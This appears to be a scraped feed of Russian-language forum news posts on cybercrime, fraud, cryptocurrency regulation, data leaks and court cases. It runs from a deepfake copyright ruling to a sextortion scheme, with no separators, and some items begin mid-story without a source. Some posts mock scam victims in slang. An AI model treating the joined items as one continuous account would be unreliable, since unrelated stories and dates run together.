Открыто уголовное производство по ч. 4 ст. 190 (Мошенничество), ст. 28 (Совершение уголовного правонарушения организованной группой или преступной организацией), ч. 1,2 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи) Уголовного кодекса Украины. Фигурантам объявлено о подозрении, им грозит до двенадцати лет лишения свободы с конфискацией имущества.
Права на видеоролик с изображением актера стали предметом юридического спора.
Компания «Рефейс Технолоджис», которая создает дипфейк-ролики с известными актерами, выиграла судебный иск против сервиса сквозной аналитики Roistat (ООО «Бизнес-аналитика»), который использовал один из ее роликов в своей рекламе без разрешения. Суд взыскал с Roistat 500 тысяч рублей компенсации за нарушение исключительного права на видеоролик.
Дипфейк — это технология, позволяющая заменять лица людей в видео с помощью нейросетей. В спорном ролике человек с лицом Киану Ривза не может уйти из дома, постоянно проверяя, выключил ли он утюг. В конце концов он уходит с утюгом в руке. Ролик был изготовлен в AMG (Agenda Media Group) и передан партнерской компании «Рефейс Технолоджис». В июне 2023 года ролик появился в рекламе Roistat в Telegram.
СЕО AMG Алексей Парфун обратился в Roistat с претензией, но получил отказ. По словам Парфуна, в Roistat заявили, что «продукция нейросетей авторским правом не регулируется, можно брать и использовать». Парфун не согласился с таким подходом и подал в суд, чтобы «разобраться в юридической практике».
Судья Виктория Крикунова признала, что видеоролик является объектом авторского права, несмотря на использование технологии дипфейк. Согласно мотивировочной части решения от 30 ноября 2023 года, «...доводы ответчика о том, что созданный видеоролик не является объектом авторского права по причине использования технологии deep-fake, отклоняются судом, поскольку технология дипфейк — это дополнительный инструмент обработки (технического монтажа) видеоматериалов, а не способ их создания». Так же и тот факт, что моушен- дизайнер по заказу AMG смонтировал исходные материалы видео с помощью дипфейка, сам по себе не свидетельствует о том, что видеоролик доступен для свободного использования (без согласия правообладателя), или о том, что лица, обеспечившие написание сценария, съемку, аудиосопровождение, «не внесли личный творческий вклад в создание видеоролика и не признаются его авторами», - следует из решения суда.
Парфун выразил удовлетворение решением суда и заявил, что «нейросети — инструмент, и созданные с их помощью произведения — это такой же объект авторского права, как любой другой». Он добавил, что «рынок становится более цивилизованным, я считаю, что это хорошо».
Roistat не ответил на вопросы Forbes, согласны ли они с решением суда и будут ли его обжаловать. Эксперты отмечают, что споры о правах на произведения, созданные ИИ, набирают силу во всем мире. Например, в Китае интернет-суд признал права авторства на сгенерированный ИИ продукт именно за пользователем.
Использование дипфейков в рекламе — одно из главных применений этой технологии. На российском рынке уже есть яркие примеры сотрудничества бизнеса и с мировыми звездами. Так, в августе 2021 года «Мегафон» представил многосерийный рекламный сериал в поддержку запуска новых тарифов. Главными героями роликов стали Брюс Уиллис и комик Азамат Мусагалиев — они сыграли напарников-спецагентов, которые обезвреживают бомбу. Как писал Forbes, Уиллису даже не пришлось прилетать на съемочную площадку — его персонажа для ролика нарисовали нейросети с помощью технологии генерации лиц. «Мы сотрудничали с Брюсом Уиллисом по прямому контракту, без посредников. Актер активно участвовал в проекте, согласовывал все сценарии роликов и финальные материалы, — сообщили Forbes в «Мегафоне». — Мы открыто заявляли аудитории об использовании этой технологии в своей рекламе. В настоящее время контракт с Брюсом Уиллисом завершен».
Эксперты считают , что такое решение может стимулировать более ответственное отношение к использованию технологии, защите авторских прав и установке четкой позиции в вопросе о принадлежности интеллектуальных прав на контент, созданный ИИ. Однако они также отмечают, что споры о правах на произведения, созданные ИИ, набирают силу во всем мире, и не всегда есть однозначный ответ на то, кто является правообладателем такого продукта: пользователь, разработчик ИИ или никто. Дело «Рефейс Технолоджис» против «Бизнес-аналитики» стало интересным прецедентом, но не исчерпывает всей проблематики.
Илюса Миннегалиева обещала подписчикам дешевые путевки в Дубай, а в итоге они остались без денег
По словам Миннегалиевой, в Дубае зарплата низкая, местами в районе 20-30 тысяч рублей в месяц.
Блогер из Казани Илюса Миннегалиева, которую обвиняют в том, что она оставила без денег порядка 800 человек, заявила, что не сможет прожить на зарплату с работой «нормальных людей».
По словам Миннегалиевой, в Дубае зарплата низкая, местами в районе 20-30 тысяч рублей в месяц. На эти деньги не только не проживешь, но и «тем более не вернешь всем возвраты, даже за год». Переживает блогер и за то, что с работой, у нее на остальное не останется времени.
Очередным способом заработка для ее семьи стала продажа телефонов. Однако дело у Миннегалиевой не пошло, продать удалось только два устройства. Хотели еще продать PlayStation 5, но никто не купил. «На 5 человек сейчас у нас всего 3 телефона», сетует блогер.
Криптовалютная биржа BKEX сообщила о приостановке вывода клиентских средств на время полицейского расследования, которое проводится в связи с возможным отмыванием денег несколькими пользователями.
В своем заявлении площадка подчеркнула, что будет максимально сотрудничать с представителями правоохранительных органов и регуляторов, и постарается восстановить функциональность в кратчайшие сроки. При этом команда BKEX пообещала также уделить максимальное внимание защите прав пользователей.
«Мы будем поддерживать прозрачность процесса и обеспечивать своевременную обратную связь во время расследования. Если у вас возникнут вопросы или понадобится какая-либо другая помощь, не стесняйтесь обращаться в службу поддержки», ― отмечается в заявлении биржи.
Пользователи площадки оказались недовольны таким решением ― они спрашивают, почему из-за незаконных действий нескольких клиентов страдают все. Кроме того, многие беспокоятся о финансовом благополучии компании в связи с кризисом на рынке. Однако, представители BKEX пообещали, что вывод средств будет восстановлен уже скоро и посоветовали клиентам быть терпеливыми.
Биржа BKEX была основана в 2018 году и зарегистрирована в юрисдикции Британских Виргинских островов. Объем торгов на площадке за последние сутки, согласно данным CoinMarketCap, составил $434 млн.
Первой тревогу забила мама парня — Галина обнаружила пропажу 130 тысяч рублей из домашней заначки. Подозрения сами собой пали на 14-летнего сына, семиклассника Андрея (имя изменено), и после допроса с пристрастием парень признался, что взял около 10 тысяч «на сладкое». Вот только куда делись остальные деньги, школьник объяснить не смог.
Следующие пару дней Галина провела в тяжелых раздумьях и по итогу снова атаковала сына вопросами. Тогда Андрей все-таки сломался: оказалось, он подворовывал у мамы аж два месяца, а все деньги отдал девятикласснику из своей школы. Зачем? На важное дело: чтобы купить аккаунт в онлайн-игре Stanoff 2 за 20 тысяч и закинуть на счет в ней всю оставшуюся сумму.
Однако план дал осечку: узнав о сделке юных геймеров, Галина позвонила классному руководителю Андрея и завучу. После этого парней вызывали с родителями в школу на серьезный разговор. Но он особо не задался — отец девятиклассника стал обвинять во всем самого Андрея и попросту запретил говорить собственному сыну. Поэтому как теперь вернуть деньги из игры, неясно.
По словам исследователей, в 2022 году 43% атак программ-вымогателей начиналось с эксплуатации уязвимостей в общедоступных приложениях.
Отчет компании [гласит](https://securelist.ru/kaspersky-incident-response- report-2022/107406/), что почти в каждом четвертом случае (24%) атаки вымогателей начинались с использования ранее скомпрометированных аккаунтов пользователей, а в 12% ― с вредоносных писем.
[](https://xakep.ru/wp- content/uploads/2023/05/424369/tools.png)
При этом отмечается, что в ряде случаев целью атакующих было не шифрование данных, а получение доступа к личной информации пользователей, интеллектуальной собственности и другим конфиденциальным данным организаций.
Кроме того, вымогательство не всегда было целью атак шифровальщиков. В некоторых случаях они использовались для того, чтобы скрыть следы атаки и затруднить ее расследование.
Также в ходе расследования инцидентов с применением шифровальщиков эксперты компании обнаружили, что в большинстве случаев злоумышленники находились в сети клиента некоторое время после проникновения. Атакующие зачастую используют PowerShell для сбора данных, Mimikatz для повышения привилегий и PsExec для удаленного выполнения команд или фреймворки типа Cobalt Strike для проведения всех этапов атаки.
[](https://xakep.ru/wp- content/uploads/2023/05/424369/stats.png)
«Скомпрометированные учетные данные пользователей, уязвимости в ПО и методы социальной инженерии в большинстве случаев позволяют злоумышленникам проникать в корпоративную инфраструктуру и производить вредоносные действия, в том числе и атаки посредством программ-шифровальщиков. Чтобы минимизировать эти риски, важно, чтобы компании вводили и контролировали политику надежных паролей, регулярно обновляли корпоративное ПО, а также обучали сотрудников основам информационной безопасности», ― комментирует Константин Сапронов, руководитель глобальной команды реагирования на компьютерные инциденты «Лаборатории Касперского».
Click to expand...
Как показал традиционный ежегодный опрос компании, более 40% компаний во всем мире подверглись как минимум одной атаке программы-вымогателя в 2022 году. При этом малые и средние предприятия платили за восстановление данных в среднем 6500 долларов, а крупный бизнес ― 98 000 долларов.
Кроме рынка в дарквебе у злоумышленника огромный “послужной список”.
В среду Министерство юстиции США предъявило обвинение печально известному британскому хакеру за управление уже не работающим дарквеб-маркетплейсом под названием The Real Deal. 34-летний обвиняемый Дэниэл Кайе (он же Bestbuy, Spdrman, Popopret, UserL0ser) мог управлять рынком незаконных услуг с начала 2015 года по ноябрь 2016 года, когда The Real Deal закрылся.
Киберпреступники использовали эту платформу для продажи и покупки всего – от украденных учетных данных для систем государственных учреждений США и хакерских инструментов до запрещенных веществ, оружия и секретных правительственных документов.
Среди учетных данных, выставленных на продажу на The Real Deal, в судебных документах упоминаются четные данные, украденные у:
NASA;
ВМС США,
Национальное управление океанических и атмосферных исследований (NOAA);
Центры по контролю и профилактике заболеваний США (CDC);
Почтовой службы США (USPS).
Кроме этого, Кайе мог заниматься продажей аккаунтов Twitter и LinkedIn, а также продавать украденные номера социального страхования с помощью группировки TheDarkOverlord. Все заработанное хакер отмывал, используя сервис Bitmixer.io, чтобы скрыть свои незаконные доходы от правоохранительных органов.
Еще злоумышленник стоял за разработкой и продажей вредоносного ПО GovRAT, которое его “клиенты” использовали для взлома правительственных учреждений США.
Но одним из его самых громких дел стал взлом оператора Deutsche Telekom в конце ноября 2016 года. Тогда хакер пытался захватить 900 000 маршрутизаторов для усиления мощности своего DDoS-ботнета, но случайно вывел их из строя.
А после того, как злоумышленник попытался захватить еще 100 000 маршрутизаторов в сети нескольких британских интернет-провайдеров и, опять же, случайно их отключил, его поймали агенты из Национального агентства по борьбе с преступностью Великобритании (NCA) в конце февраля 2017 года в лондонском аэропорту.
Согласно пресс-релизу Минюста, на момент предъявления обвинения Кайе находился за границей, и в сентябре 2022 года он дал согласие на свою экстрадицию с Кипра в США.
source: documentcloud.org/documents/23200641-daniel_kaye_criminal_indictment
Объявление, размещенное пользователем ChinaDan на Breach Forums, собрало 177
ответов и 300 000 просмотров в течение нескольких часов. В посте ChinaDan
заявил, что терабайты данных и информации о миллиарде китайских граждан стали
доступны в результате утечки базы данных Шанхайской национальной полиции в
2022 году.
База данных включает в себя:
имена;
адреса проживания;
места рождения;
национальные идентификаторы;
номера телефонов;
информацию об уголовных делах.

Несмотря на споры, многие пользователи считают объявление легитимным. Некоторые члены форума проверили данные образцов, которые выложил ChinaDan и считают, что 10 биткоинов – слишком низкая цена.
“Лично я убежден, что данные на 98% реальны. Возможно, они не совсем актуальны, но это не критично. Тот, кто выставил это на продажу на подобном сайте по такой низкой цене, либо безумен, либо просто хочет унизить китайское правительство". – пишет один из пользователей форума.
Тема была закрыта администраторами форума в воскресенье. За данные было предложено 6 биткойнов (116 000 долларов США).
Скам или очередной комбо лист?
Директор отдела киберпреступности IRS Джарод Купман раскрыл в интервью CNBC размеры конфискованной криптовалюты в 2021-м году. На данный момент налоговое ведомство получило $1,2 млрд, что значительно выше результатов работы в 2020-м году, составивших $137 млн.
По мнению Купмана, объемы конфискации криптовалюты будут расти гораздо большими темпами, поэтому IRS готово прибегнуть к помощи частного сектора по реализации криптовалюты.
IRS уже работает с частниками для хранения изъятой цифровой валюты. Изначально эти услуги предоставлял BitGo, но сейчас в качестве кастодиана выбран Anchorage.
Ранее криптовалюта продавалась на аукционах одним лотом, но теперь рост объема конфиската требует от IRS подключить маркетмейкеров для реализации монет без влияния на рыночный курс. Налоговая служба не планирует удерживать цифровые активы с цель получения дополнительной инвестприбыли, несмотря на то, что ее первые изъятые в 2013-м году активы, принесли бы сейчас доход в $1,4 млрд.
Купман объясняет увеличение объема «криптоулова» IRS, постепенным улучшением результатов расследований по уклонению от уплаты налогов. Налоговое ведомство совершенствует методы отслеживания транзакций, сопоставляя их с традиционной информацией.
Недостаток финансирования не позволяет IRS использовать какие-либо «секретные» технологии, кроме открытого блокчейна, но помогает кооперация с другими службами. Совместные расследования приводят к эффективному захвату аппаратных кошельков во время обысков и ряда других методов, которые Купман не стал раскрывать в эфире CNBC.
Как раз после заявления кое-кого об отключении интернета в рф :"DDDD
На вершине пирамиды - контентные и смысловые угрозы, а в самом низу угрозы сетям связи.
Роскомнадзор публикует пирамиду современных взаимосвязанных сетевых угроз, вызванных применением цифровых технологий на семи уровнях информационного пространства.
Названы источники и возможные последствия.
В основе пирамиды – угрозы сетям связи, интернет-маршрутизации и конфиденциальности данных.
На вершине — контентные и смысловые угрозы, связанные с манипуляцией интернет-платформами общественным сознанием.Click to expand...
Пирамида с глазом кстати)000
Как выяснили полицейские, история обмана 39-летнего жителя села Табук. Началось с сообщения в WhatsApp от девушки с предложением познакомиться. После недолгой переписки она начала интересоваться материальным положением мамонтооборазного, хвастаться своим успехом на инвестициях и предложила ему присоединиться.
Мамонт согласился и вскоре с ним связался «частный аналитик», который скинул видеоурок о заработке на крипте. Затем бедолаге представили «трейдера», который потребовал 5 тысяч рубасов для старта «сделки». Лохматик, доверившись, перевел деньги. После этого ему предложили вложить еще 5 баксов для покупки платины.
Чтобы получить необходимую сумму, в дальнейшем новоиспеченному инвестору пришлось взять кредит. Из-за плохой истории, он обратился за помощью к своему соседу. Скамеры, в свою очередь, убедили их в том, что это не кредит, а продукт, который вернется с процентом за сделку.
— Когда сельчанин перевел 1.5 миллиона рублей, разводилы заявили, что большая сумма не может быть выведена на одного человека, потребовав найти доверенное лицо. Тут и стало понятно, что это все обман. Возбуждено дело по ст. 159 ч.4.
Russian president Vladimir Putin signed a law Friday banning the use of crypto to pay for goods and services.
Russian President Vladimir Putin
approved a law Friday
prohibiting the use of digital assets as forms of payments in Russia.
The legislation will
reportedly prohibit
the transfer or acceptance of “digital financial assets as a consideration for
transferred goods, performed works, rendered services, as well as in any other
way that allows one to assume payment for goods (works, services) by a digital
financial asset, except as otherwise provided by federal laws,” effectively
banning the use of crypto or NFTs as forms of payments.
The bill was submitted to the State Duma in June by the head of the
legislature's Committee on Financial Markets, Anatoly Aksakov, and signed into
law by Putin Friday. The new law also includes a provision that requires
crypto exchanges and providers refuse transactions in which digital assets
could be construed as a form of payment.
The Russian government has seen internal
conflict on
crypto regulation, with various agencies at odds with each other on whether to
ban crypto outright or just regulate it. The Central Bank of Russia had called
for a crypto ban in January, which the Ministry of Finance opposed, saying
instead that “regulation is sufficient to protect our citizens.”
The new law is set to take effect in 10 days.
There's been some speculation that sanctioned Russian companies or individuals
might use crypto to avoid sanctions imposed after the country's invasion of
Ukraine. But officials have proven savvy in using on-chain analytics to trace
transactions, and industry experts have warned that sanctions evaders would be
ill-served by trying to use cryptocurrencies. US and EU bodies have even
[added specific crypto wallet addresses](https://home.treasury.gov/policy-
issues/financial-sanctions/recent-actions/20220405) to sanction lists.
Source :https://www.protocol.com/bulletins/russia-ban-crypto-payments
Недавняя утечка информации Пентагона в Интернете вызывает некоторое дежавю у геймеров, для которых разглашение военных секретов на форумах видеоигр стало тенденцией последних лет.
Почему это важно: Прошлые инциденты показывают, как трудно остановить такие утечки. Разместить документы в Интернете легко, а стремление выиграть спор или произвести впечатление на коллег в Интернете очень сильно.
Причина новости: С середины 2021 года поклонники реалистичной игры на военную тематику War Thunder периодически размещали секретную или иную ограниченную информацию, связанную с британскими, французскими, китайскими и американскими системами вооружений, в результате чего модераторы форумов старались удалить сообщения.
Самая последняя утечка на форуме War Thunder, включающая документацию
ограниченного доступа о возможностях истребителя F-16A американского
производства, была опубликована пользователем 15 января.
Она была удалена на следующий день после того, как другой пользователь задался
вопросом, не нарушает ли она обширные запреты издателя Gaijin Entertainment на
размещение "информации ограниченного доступа".
Поспешите наверстать упущенное: На прошлой неделе федеральные власти
арестовали и предъявили обвинения Джеку Тейшейре, 21-летнему военнослужащему
Национальной воздушной гвардии штата Массачусетс, в связи с утечкой
разведданных Пентагона.
Предположительно, он впервые поделился секретной информацией, чтобы произвести
впечатление на группу друзей, пользующихся популярной платформой Discord, где
они общались об играх и оружии.
Что они говорят: "Наши игроки очень увлечены War Thunder и военной техникой, и
иногда они слишком увлечены", - сказал Axios Антон Юдинцев, основатель
будапештской компании Gaijin Entertainment.
War Thunder позволяет игрокам сражаться друг с другом, используя виртуальные
версии реальных танков и самолетов, которые разработчики стремятся изобразить
как можно точнее.
Игроки ожидают подлинности, говорит Юдинцев, приводя в качестве примера танк,
используемый французскими военными: "Когда кто-то предпочитает играть на
Leclerc в War Thunder, он обычно мотивирован убедить команду разработчиков
увеличить характеристики танка, предоставив какую-то документацию".
В 2021 году пользователь War Thunder, утверждавший, что он был членом экипажа
настоящего танка Leclerc, разместил часть руководства, после чего модераторы
удалили его.
Юдинцев считает, что было как минимум шесть подобных утечек, которые были
отмечены членами сообщества и удалены модераторами форума. Он подчеркивает,
что его разработчики не читают эти утечки и просит фанатов не размещать их.
"Мы никогда не будем использовать в своей работе секретную или ограниченную
информацию. Это и незаконно, и бессмысленно, поскольку у нас не будет
возможности определить, являются ли эти "секретные документы" подлинными", -
говорит Юдинцев.
Общая картина: Эти утечки, помимо всего прочего, являются проблемой модерации
контента.
Руководители онлайн-сообществ говорят, что остановить утечку цифровой
информации сложно, в частности, из-за сложности оценки достоверности
содержащейся в них секретной информации.
В пятницу главный юридический директор Discord Клинт Смит в своем блоге
заявил, что "секретные документы военной разведки представляют собой
значительную и сложную проблему для Discord, как и для других онлайн-
платформ", поскольку только правительство может подтвердить их подлинность.
Discord сотрудничает с властями, но нет "структурированного процесса" для
правительства, чтобы сообщить таким платформам, как Discord, когда у них есть
секретная информация, сказал Смит.
Между строк: Согласно последнему отчету компании о прозрачности, за последние
три месяца 2022 года Discord получил около 2 000 юридических запросов, но
представитель компании не ответил на вопрос Axios о том, сколько запросов о
секретных утечках получает Discord, если вообще получает.
Итог: Последствия утечек военной информации могут быть самыми разными.
Фанаты War Thunder, увлекшись, пытаются перещеголять друг друга в отношении
систем вооружения, чтобы убедить разработчиков изменить настройки истребителя
или танка, которые встречаются на поле боя уже несколько десятилетий.
Это не то же самое, что делиться почти в реальном времени информацией об
активной войне, в чем обвиняют Тейшейру.
Общим в этих инцидентах является изолированная динамика онлайн-форума, которая
подпитывает навязчивые идеи, разжигает конкуренцию за статус и заставляет
некоторых участников чувствовать, что у них есть лицензия на безнаказанное
размещение секретов.
https://www.axios.com/2023/04/20/pentagon-leak-war-thunder-discord
Пенсионер потерял деньги, а компания допустила звонок мошенников.
В Ленинградской области прокуратура выступила с иском против сотового оператора, требуя возмещения средств, похищенных у пожилого гражданина телефонными мошенниками. Как сообщили в пресс-службе надзорного органа, данная инициатива призвана защитить наиболее уязвимых членов общества - пенсионеров и ветеранов, которые часто становятся жертвами изощренных схем обмана, и в силу возраста и иных уважительных обстоятельств не могут самостоятельно защитить себя.
По данным прокураторы, не мало граждан пострадало от преступлений, связанным с «дистанционным мошенничеством». Злоумышленники, выдавая себя за банковских работников или правоохранителей, обманным путем убеждают жертв, что их сбережениям угрожает опасность, а затем похищают деньги. Зачастую мошенники используют «подменные» номера, маскируя свои реальные иностранные номера под российские. При этом у пострадавшего не остается сомнений, что ему звонят с территории нашей страны.
Законодательство обязывает операторов не пропускать такие звонки в свою сеть. Невыполнение этого требования является основанием для административной ответственности по ст. 13.2.1 КоАП РФ. Как отметили в прокуратуре, бездействие оператора, позволившего мошеннику дозвониться, означает ненадлежащее оказание услуг связи и причинение абоненту материального ущерба.
В данном случае, мошенники смогли обмануть местного жителя 1940 года рождения. Прокурором Ломоносовского района подан иск в защиту прав потерпевшего о взыскании с оператора украденных средств и компенсации морального вреда.
Это первый случай в России, когда прокуратура взыскивает деньги, похищенные мошенниками, с оператора сотовой связи. «Таким образом будет создан дополнительный правовой механизм, позволяющий компенсировать имущественные потери, понесенные обманутыми людьми при бездействии сотовых операторов", - сообщили в прокуратуре Ленинградской области.
В федеральном суде Сан-Диего австралиец Осемах Эльхасен получил 63 месяца (5,25 лет) тюремного заключения за участие в международном сговоре, связанном с продажей зашифрованных устройств ANOM преступным организациям. Эти устройства использовались для координации наркоторговли и других преступлений.
Эльхасен был одним из 17 обвиняемых, фигурировавших в деле, инициированном в рамках операции «Троянский щит». В ходе этой спецоперации ФБР управляло платформой ANOM, которая использовалась преступниками для зашифрованной переписки. Это позволило агентам перехватить более 27 миллионов сообщений и задержать сотни человек по всему миру.
По данным суда, Эльхасен занимался распространением устройств ANOM из Колумбии, а также принимал участие в наркоторговле и отмывании денег. Он признал вину в 2024 году и согласился с обвинениями в создании преступного сообщества. Эльхасен содействовал продаже устройств более полутора лет, помогая транспортировать не менее 15 килограммов запрещённых веществ.
Анализ сообщений ANOM показал, что Эльхасен активно продвигал устройства в Колумбии и других странах. Он организовывал техподдержку, продление подписок и участвовал в определении цен на услуги.
В 2021 году Эльхасен был арестован в Колумбии, а затем экстрадирован в США. При вынесении приговора прокурор США Тара Макграт заявила, что даже самые сложные технологии не могут скрыть преступников от правосудия. Руководитель отдела ФБР в Сан-Диего Стейси Мой добавила, что подобные устройства не просто предлагают услуги связи, а содействуют транснациональной преступности.
Трое других обвиняемых по этому делу уже признали вину и ожидают приговора. Ещё восемь обвиняемых пока не экстрадированы, один находится в розыске.
justice[.]gov/usao-sdca/pr/distributor-anom-hardened-encrypted-devices- sentenced-63-months-prison-racketeering
Следственным подразделением УМВД России по Калужской области окончено расследование уголовного дела, возбужденного по признакам преступлений, предусмотренных статьей 158 «Кража» и статьей 159 «Мошенничество» Уголовного кодекса Российской Федерации.
По версии правоохранителей, трое жителей Калужской области – двое мужчин и женщина осуществляли звонки авторам объявлений о продаже различного имущества, размещенных в сети Интернет. Под предлогом покупки товара фигуранты обманным путем завладевали данными банковских карт, принадлежащих продавцам, после чего производили списание денежных средств с чужих счетов.
Кроме того, используя полученную таким образом конфиденциальную информацию, в том числе пароли, фигуранты посредством мобильного устройства и приложения «Мобильный банк» подавали в финансово-кредитную организацию заявки и заключали от имени владельцев личных кабинетов кредитные договоры, денежные средства по которым поступали на подконтрольные соучастникам банковские счета.
Фигурантам инкриминируется 19 эпизодов, ущерб по которым варьируется от 2 тысяч рублей до 872 тысяч рублей в каждом конкретном случае. Общая сумма ущерба составила более 3 миллионов рублей.
На период следствия в отношении одного из мужчин была избрана мера пресечения в виде ареста, в отношении двух других лиц – в виде подписки о невыезде и надлежащем поведении.
По завершении всех процессуальных действий уголовное дело будет направлено в суд для рассмотрения по существу.
Интернет в КНДР обрушил хакер-одиночка
Хакер отключил интернет в КНДР в отместку за то, что ранее сам стал жертвой северокорейских хакеров.
В середине прошлого месяца Северная Корея страдала от ряда загадочных отключений интернета, кульминация которых пришлась на 26 января, когда страна полностью ушла в offline. Ходили слухи, что причиной отключения КНДР от глобальной Сети стала кибератака, но кто за ней стоял, было неизвестно.
Как сообщает издание Wired, ответственность за инцидент взял на себя некто под псевдонимом P4X. По его словам, он обрушил интернет в Северной Корее совершенно единолично в отместку за то, что ранее сам стал жертвой северокорейских хакеров.
В январе 2021 года специалисты Google Threat Analysis Group раскрыли вредоносную кампанию, нацеленную на исследователей безопасности, специализирующихся на поиске уязвимостей. Целью операции, проводимой хакерами, работающими на правительство КНДР, было похищение исследований и инструментов.
По словам P4X, он стал одной из жертв этой кампании. С исследователем связалось ФБР, но ему все равно показалось, что принимаемых властями мер недостаточно, поэтому он решил взять дело в свои руки. Что же он сделал? Проэксплуатировал уязвимости в системах КНДР для запуска DoS-атак на серверы и маршрутизаторы, поддерживающие работу сети в стране.
Хотя заявления P4X на первый взгляд могут вызвать сомнения, судя по предоставленным им изданию Wired материалам, хакер говорит правду. Записи экрана и аналитика северокорейской активности в Сети во время атак подтверждают его слова.
Поскольку у большинства жителей КНДР нет доступа к интернету в принципе, отключение глобальной Сети во всей стране вряд ли кто-то заметил. Однако, как заявил P4X, он преследовал лишь одну цель – сделать предупреждение северокорейскому правительству.
«Я хотел затронуть как можно меньше людей и как можно больше правительство», – пояснил исследователь.
P4X также запустил сайт в даркнете под названием FUNK Project (FU North Korea) для привлечения хактивистов, готовых выступать против режима Ким Чен-Ына.
Эксперты Positive Technologies отнесли к трендовым девять уязвимостей. Среди них уязвимости, обнаруженные в продуктах Microsoft и VMware, Linux, VPN-шлюзе от Check Point Software Technologies и в программном обеспечении Veeam Backup Enterprise Manager.
Три уязвимости Windows, описанные ниже, потенциально затрагивают, согласно данным The Verge, около миллиарда устройств. Они позволяют злоумышленнику получить максимальные привилегии в системе и продолжить развивать атаку. Последствия могут коснуться всех пользователей устаревших версий Windows.
Уязвимость в компоненте для хранения автономных файлов Client-Side Caching
(CSC) Windows, приводящая к повышению привилегий
CVE-2024-26229 (оценка по CVSS — 7,8)
Уязвимость в службе для отправки сообщений об ошибках (Windows Error
Reporting), приводящая к повышению привилегий
CVE-2024-26169 (оценка по CVSS — 7,8)
Уязвимость ядра Windows, приводящая к повышению привилегий
CVE-2024-30088 (оценка по CVSS — 7,0)
Уязвимость в подсистеме межсетевого экрана netfilter ядра Linux, приводящая к
повышению привилегий
CVE-2024-1086 (оценка по CVSS — 7,8)
Уязвимости, связанные с удаленным выполнением кода в VMware vCenter
CVE-2024-37080 и CVE-2024-37079 (оценка по CVSS — 9,8)
Уязвимость, связанная с удаленным выполнением кода в языке PHP при применении
пользователем Apache и PHP CGI в Windows
CVE-2024-4577 (оценка по CVSS — 9,8)
Уязвимость, связанная с раскрытием информации в VPN-шлюзах Check Point
Sofrtware Technologies
CVE-2024-24919 (оценка по CVSS — 8,6)
Уязвимость обхода аутентификации в Veeam Backup Enterprise Manager
CVE-2024-29849 (оценка по CVSS — 9,8)
Роскомнадзор (РКН) советует российским фирмам и корпорациям активизировать процесс адаптации информационных систем и методов, обеспечивающих их внутреннее функционирование, к инфраструктуре, расположенной в пределах России. Это связано с тем, что применение VPN-протоколов, опирающихся на иностранные серверы, может сопровождаться рисками утраты данных.
"Настоятельно рекомендуем российским корпорациям и институтам ускоренно перенастроить информационные системы и методики, гарантирующие деятельность их внутренних функциональных процедур, на серверную, программную и коммуникативную инфраструктуру, распределенную на территории нашего государства", - заявили в РКН.
РКН подчеркивает, что "использование VPN-протоколов в сотрудничестве с иностранными серверами может привести к существенным угрозам утраты личных, корпоративных и других данных".
В службе акцентировали внимание на том, что "по закону "О связи" в России деятельность VPN-сервисов, которые не гарантируют фильтрацию нелегальной информации, является недопустимой".
Регулятор оставил без ответа вопрос о возможной связи сбоя в работе наиболее известных VPN-сервисов в РФ с его действиями.
С начала недели эксперты отмечают, что РКН приступила к блокировке VPN- сервисов в России, не посредством IP-адресов, но на основе протоколов, в частности, речь идет о протоколах OpenVPN, IKEv2 и WireGuard. По мнению аналитиков, ограничения могли затронуть организации, использующие VPN для безопасного доступа к системам удаленных сотрудников и кооперирующихся с иностранными контрагентами.
Ранее в РФ было ограничено взаимодействие с рядом популярных сервисов, таких как ExpressVPN, Nord VPN, Hola!VPN, IPVanish VPN, KeepSolid VPN Unlimited, Speedify VPN. РКН предоставляет возможность взаимодействия с сервисами только для организаций из так называемого белого списка, которые уведомили регулятор о необходимости использования VPN в своей деятельности. Список подобных организаций растет.
В прошлом месяце председатель комитета Госдумы по информационной политике Александр Хинштейн отметил, что в России заблокировано около 20 ведущих VPN- сервисов и процесс блокировки VPN будет продолжаться.
Лефортовский районный суд Москвы в пятницу по ходатайству следствия заочно арестовал расследователя Bellingcat Христо Грозева.
Как сообщает "Медиазона" со ссылкой на [базу](https://mos- gorsud.ru/rs/lefortovskij/services/cases/criminal- materials/details/0246f690-e01a-11ed-b213-e3a6ef4f257b) суда, следствие просило арестовать Грозева по статье о незаконном пересечении границы России.
В декабре прошлого года МВД России [объявило](https://www.svoboda.org/a/mvd- rossii-obyavilo-v-rozysk-hristo-grozeva-iz-bellingcat-/32194088.html) Грозева в розыск. По какой статье в отношении журналиста-расследователя завели уголовное дело, тогда не уточнялось.
ТАСС со ссылкой на источник позднее в пятницу сообщило, что дело связано с обвинением Грозева в организации выезда из России главного редактора издания The Insider Романа Доброхотова. Bellingcat и The Insider проводят совместные расследования.
Доброхотов покинул Россию летом 2021 года. Он сам подтвердил, что пересёк российско-украинскую границу, минуя официальные пункты пропуска. ФСБ тогда заявляла, что против него возбуждено уголовное дело.
Грозев прокомментировал решение суда в твиттере, процитировав шутку, как он утверждает, принадлежащую Доброхотову, о том, что российские власти могли бы просто заочно отравить своих оппонентов и на этом успокоиться.
Ранее ФСБ обвинила Грозева в помощи украинской разведке. По версии ФСБ, сотрудники Главного управления разведки Украины, "действуя от имени политического руководства своей страны, пытались завербовать за денежное вознаграждение и гарантии получения гражданства одной из стран Евросоюза российских военных летчиков". План, как утверждается, предусматривал, что завербованные российские лётчики должны были увести самолёты на контролируемые Украиной аэродромы.
В сюжете государственного телеканала "Россия 24" был показан фрагмент переписки, в котором утверждалось, что Грозев нашёл двух курьеров для передачи денег согласившемуся на угон российскому лётчику. В официальном сообщении ФСБ этих подробностей не было.
Грозев в разговоре с Радио Свобода ранее отверг сообщения об участии в каких- либо операциях спецслужб. По его словам, команда Bellingcat снимала документальный фильм-расследование о том, как ФСБ и украинские спецслужбы ведут игру, пытаясь обмануть друг друга. Он также назвал поддельным скриншот его якобы переписки, показанный в сюжете российского телевидения и призванный служить доказательством участия его самого в операции.
Источник:
](https://www.svoboda.org/a/rossiyskoe-sledstvie-prosit-zaochno-arestovatj- hristo-grozeva-iz-bellingcat-/32373703.html)
По статье о незаконном пересечении границы России. Христо Грозев – гражданин Болгарии, живёт в Европе
www.svoboda.org
Злоумышленники успели заработать не менее $47 тыс на шантаже.
Связываясь с жертвами через платформы для секс-знакомств, киберпреступники предлагали пользователям вступить в чаты для обмена интимными фотографиями по ссылке, которая содержала вредоносное мобильное приложение. Ничего не подозревающие жертвы загружали приложение, которое похищало список их контактов. После этого злоумышленники начинали шантажировать жертв, угрожая отправить интимные фотографии друзьям и родственникам.
